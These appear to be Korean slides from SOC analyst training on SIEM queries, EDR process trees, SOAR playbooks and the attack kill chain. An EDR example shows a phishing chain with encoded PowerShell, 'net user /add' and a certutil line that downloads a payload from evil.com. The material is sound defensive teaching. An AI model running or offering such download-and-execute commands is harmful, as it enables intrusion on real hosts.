실제 예시 1개와 연결해 기억하기
다음 슬라이드와 이어지는 질문을 스스로 만들기

SIEM 활용 예시: 분석가가 실제로 하는 일

검색, 상관분석, 대시보드, 케이스 생성이 핵심 작업

Part 4

검색(Search) 예시

                    user = "finance01"

                    AND action = "login_success"

                    AND src_country != "KR"

                    AND time > "2026-03-18 00:00"

"finance01 계정의 해외 로그인 성공 이력 조회"

상관분석 룰 예시

                    IF login_fail_count > 100

                      AND time_window < 5min

                      AND target = service_account

                    THEN Alert("Brute-force 의심")

"5분 내 서비스 계정 로그인 100회 이상 실패 시 Alert"

대시보드

실시간 Alert 현황, 국가별 로그인 분포, 이상 행위 Top 10, SLA 준수율 등

케이스 생성

Alert → 조사 메모 → 근거 → 판정 → 조치 이력을 하나의 Case에 기록

SIEM 쿼리 결과 해석 — "이 3줄에서 무엇을 봐야 하나?"

# Splunk SPL — 로그인 실패 다발 탐지

            index=auth EventCode=4625 | stats count by user, src_ip, dest

            | where count > 10 | sort -count

# 결과 (상위 3행)

            user=admin,    src=203.0.113.45, dest=DC01,  03시, count=847

            user=svc_backup, src=192.168.1.50, dest=FILE01, 02시, count=203

            user=jsmith,   src=8.8.8.8,      dest=MAIL01, 14시, count=12

🚨 1행: admin + 외부 IP + 새벽 3시 + 847회 실패 → 브루트포스 공격 의심 → 즉시 L2 에스컬레이션

⚠️ 2행: 백업 서비스 계정 + 내부 IP + 새벽 + 203회 → 백업 오류 가능성 → IT운영팀 확인 후 판단

✅ 3행: jsmith + Google DNS + 낮 + 12회 → 비밀번호 오입력 가능성 → 당사자 확인 후 Benign

💡 세 줄이 똑같이 "로그인 실패"처럼 보이지만, 컨텍스트(누가·언제·어디서·몇 번)가 모든 판단을 바꿉니다.

EDR 활용 예시: 프로세스 트리 분석

호스트 내부에서 무슨 일이 일어났는지 깊게 볼 수 있다

Part 4

explorer.exe

                      └─ outlook.exe

                          └─ cmd.exe ⚠

                              └─ powershell.exe ⚠⚠

                                  └─ net.exe user /add ⚠⚠⚠

                                  └─ certutil -urlcache ⚠⚠⚠

왜 수상한가?

Outlook에서 cmd → PowerShell 실행은 비정상
계정 생성(net user /add)은 공격 지속성 확보 행위
certutil은 파일 다운로드 도구로 악용 가능

EDR이 가능한 조치

해당 프로세스 즉시 종료
호스트 네트워크 격리
관련 파일 격리/삭제

악성 프로세스 트리 읽기 — "이게 왜 위험한가?"

OUTLOOK.EXE  ← 정상 이메일 클라이언트

              └─ cmd.exe  ← ⚠️ 이메일 앱이 왜 cmd를 실행?

                 └─ powershell.exe -enc <base64>  ← 🚨 탐지 우회 시도

                     └─ certutil.exe -urlcache -f http://evil.com/a.exe

                         └─ a.exe  ← 악성 페이로드 실행 완료

🔍 OUTLOOK→cmd: 피싱 이메일 첨부파일 클릭 → 매크로 실행 → cmd 호출. 전형적인 피싱 공격 패턴.

🔍 -enc 플래그: 명령을 Base64로 인코딩해 보안 솔루션 탐지 우회. 정상 업무에서 거의 사용 안 함.

🔍 certutil 다운로드: Windows 기본 도구를 악용한 "Living off the Land" 기법. 악성코드 없이 시작.

✅ EDR이 이 트리를 실시간으로 보여주기 때문에 "피싱→매크로→파워셸 난독화→악성코드 다운로드" 전체 흐름을 한눈에 파악할 수 있습니다.

SOAR 플레이북 예시: 피싱 메일 대응

Alert 발생 → 자동 보강 → 조건 분기 → 조치까지의 자동화 흐름

Part 4

🔔 Trigger: "피싱 의심 메일" Alert 발생

🔍 자동 Enrichment: 발신자 평판 조회, URL 샌드박스 분석, 첨부파일 해시 확인

🔀 조건 분기: 악성 판정이면 → 4번, 불확실하면 → 분석가 승인 요청

🛡️ 자동 조치: 해당 메일 전체 사서함에서 삭제, URL 차단, 수신자에게 안내

📋 자동 기록: Case 생성, 타임라인 기록, IOC 등록, 리포트 생성

🕐 사람이 하면 30~60분 걸리는 작업을 SOAR는 2~5분에 일관되게 처리 → MTTR 대폭 감소

보강 설명SOAR 플레이북의 실제 예시를 보겠습니다. 피싱 메일 Alert가 발생했을 때 SOAR가 자동으로 수행하는 작업의 흐름입니다.

SOAR플레이북피싱

설명 확장

SOAR가 해결하려는 문제를 먼저 정리하기
플레이북 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
SOAR 관련 사용 사례를 한 가지 말로 정리하기

도구 비교 종합표

경쟁이 아니라 역할 분담 — 각각의 시야와 능력이 다르다

Part 4

구분	SIEM	EDR	IDS/IPS	SOAR
관찰 범위	전체 인프라	호스트 내부	네트워크 흐름	도구 간 연결
핵심 기능	수집·상관분석	행위 분석·격리	패턴 탐지·차단	자동화·오케스트레이션
주요 질문	"어디에서도 이런 일이?"	"이 PC에서 뭘 했나?"	"네트워크에 이상 있나?"	"자동으로 처리 가능?"
즉시 대응	△ (연동 시)	○ (격리/차단)	○ (IPS만)	○ (플레이북)
약점	로그 품질 의존	호스트 외 못 봄	암호화 트래픽 한계	프로세스 없으면 무용

SIEM은 넓게, EDR은 깊게, IDS/IPS는 네트워크를, SOAR는 빠르게 — 이것만 기억하세요

보강 설명네 가지 핵심 도구를 한 장으로 비교합니다. 각 도구는 경쟁이 아니라 역할 분담 관계라는 점을 기억하세요.

SIEMEDRIDS/IPS

설명 확장

SIEM가 해결하려는 문제를 먼저 정리하기
EDR 관련 기능과 경계 지점을 구분하기
단독 기능보다 운영 흐름 안에서 바라보기

실무 포인트

입력 데이터·출력 결과·담당 역할을 분리해서 보기
탐지 후 누구에게 어떻게 핸드오프 되는지 확인하기
정책·자동화가 없을 때 생기는 공백을 생각하기

예시 연결

콘솔에서 실제로 어떤 화면과 경보로 보일지 상상하기
오탐/정탐 두 경우를 모두 떠올리기
SIEM 관련 사용 사례를 한 가지 말로 정리하기

흔한 오해 바로잡기

보안 도구에 대한 잘못된 생각들

Part 4

오해

"SIEM 하나면 다 보인다"

실제

SIEM은 수집된 로그만 볼 수 있다. 수집 안 된 것은 보이지 않는다.

오해

"SOAR 도입하면 사람이 필요 없다"

실제

프로세스와 판단 기준이 없으면 SOAR는 자동으로 실수를 반복한다.

오해

"로그 많이 수집 = 관제 잘함"

실제

로그 양보다 컨텍스트와 탐지 룰의 품질이 SOC 성능을 결정한다.

현장에서 자주 듣는 추가 오해 3가지

"우리 회사는 작으니까 해커 타겟이 아니에요"
현대 공격자는 자동화 스캐너로 인터넷 전체를 스캔합니다. 서버가 하나뿐이어도 취약점이 있으면 공격받습니다. SMB(중소기업)가 전체 침해사고의 43%를 차지합니다 (Verizon 2024).

"백신(안티바이러스)만 있으면 충분하죠"
현대 공격자는 파일리스(Fileless) 기법으로 파일 없이 메모리에서만 실행합니다. 백신은 파일 기반 악성코드에 최적화돼 이런 공격을 탐지하지 못합니다. EDR·SIEM 같은 행위 기반 탐지가 필요한 이유입니다.

"보안 사고는 무조건 외부 해커 탓이다"
침해 원인의 74%에 내부 인간 실수(오설정, 피싱 클릭, 권한 남용)가 포함됩니다 (Verizon 2024). 직원이 피싱 링크를 클릭하는 것이 가장 흔한 공격 시작점입니다.

Check Point: Part 4 복습

보안 도구에 대해 스스로 답해 보세요

Part 4 · 퀴즈

스스로 답해 보세요

Q1. SIEM과 EDR의 관찰 범위 차이는?

Q2. IDS와 IPS의 핵심 차이는?

Q3. SOAR의 플레이북이란 무엇인가?

Q4. "SIEM은 넓게, EDR은 _____, SOAR는 _____" 빈칸을 채우면?

Q5. SOAR 자동화가 위험해지는 경우는?

보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.

퀴즈복습

답변 힌트

핵심 정의를 한 문장으로 먼저 답하기
예시는 1개만 붙여 간결하게 설명하기
용어 차이는 목적과 역할로 구분해 말하기

생각 순서

사실 → 맥락 → 판단 순서를 유지하기
오탐 가능성과 추가 확인 항목을 함께 적기
마지막은 다음 조치 제안으로 마무리하기

토론 포인트

다른 역할이라면 같은 질문을 어떻게 볼지
판단을 바꿀 추가 데이터가 무엇인지
실무에서의 영향과 우선순위까지 연결하기

Part 4 요약 — 보안 도구 이해

Part 4 · 요약

✓ SIEM: 전체 인프라 로그 수집·상관분석 — "넓게 본다"

✓ EDR: 호스트 내부 프로세스/파일 행위 — "깊게 본다"

✓ IDS/IPS: 네트워크 패턴 탐지/차단 — "흐름을 감시한다"

✓ SOAR: 반복 업무 자동화, 도구 연결 — "빠르게 움직인다"

✓ 핵심: 도구의 개수보다 연결성이 중요 — 핸드오프 없는 운영 체인이 목표

보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.

SIEMEDRIDS/IPS

핵심 회수

SIEM·EDR 핵심어를 세 문장으로 압축해 보기
정의보다 역할·가치·흐름을 연결해서 설명하기
비슷한 개념과의 차이를 짧게 대비해 보기

실무 연결

현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
판단이 필요한 순간과 비용을 함께 생각하기
오탐과 과소판단이 만드는 리스크를 비교하기

복습 체크

혼자 설명 가능한 핵심 용어 3개 고르기
다음 모듈과 이어질 질문 1개 만들어 보기
실무 문장으로 바꾸어 다시 써 보기

공격 시나리오 사례

공격 체인 이해와 타임라인 분석, 분석가 체크리스트

약 40분

공격 체인 ATT&CK 타임라인 피싱 체크리스트

공격은 단일 이벤트가 아니라 체인으로 보인다

피싱 한 통에서 끝나지 않고, 계정 탈취 → 내부 접근 → 수집 → 유출로 이어진다

Part 5

피싱 메일
Initial Access

→

인증정보 탈취
Credential Access

→

비정상 로그인
Persistence

→

내부 탐색
Discovery

→

데이터 수집
Collection

→

외부 유출
Exfiltration

MITRE ATT&CK 관점: Tactic은 "왜(Why)", Technique은 "어떻게(How)" — 공격 행위를 구조화하는 프레임워크

각 단계에서 SOC가 "어디서" 이상 신호를 발견하는가

피싱 메일

→ 이메일 게이트웨이에서 악성 URL·첨부 탐지. 직원이 클릭하면 Proxy 로그에 악성 도메인 접속 기록이 남는다.

인증정보 탈취

→ 이후 로그인 로그에서 해당 계정으로 다른 국가·새 디바이스 접속이 나타난다. SIEM의 "동일 계정, 다른 위치" 룰이 발동한다.

내부 탐색

→ EDR에서 powershell, net user, whoami 등 내부 정찰 명령 실행 기록이 보인다. SIEM 상관분석에서 연쇄 실행을 감지한다.

킬체인 단계별 탐지 기회 — "언제 잡을 수 있는가?"

공격 단계	공격자 행위	SOC 탐지 소스	탐지 시 피해 수준
정찰	LinkedIn, 이메일 수집	외부 활동 — 탐지 어려움	없음
초기 침투	피싱 → 매크로 → 쉘	이메일 게이트웨이 + EDR	최소 (단일 호스트)
권한 확보	비밀번호 덤프, 관리자 탈취	EDR (LSASS 접근 탐지)	중간 (내부 확산 시작)
측면 이동	내부 서버 순차 침투	SIEM 상관분석	높음 (다수 시스템)
목적 달성	데이터 유출 or 랜섬웨어	DLP + 네트워크 이상	치명적 — 너무 늦음

💡 공격자는 체인을 끊기지 않게 진행해야 하지만, SOC는 어느 단계에서도 끊을 수 있습니다. 빠를수록 피해가 작습니다.

타임라인으로 보면 공격이 보인다

점 형태의 이벤트를 시간순 맥락으로 재구성하는 것이 SOC 분석의 핵심

Part 5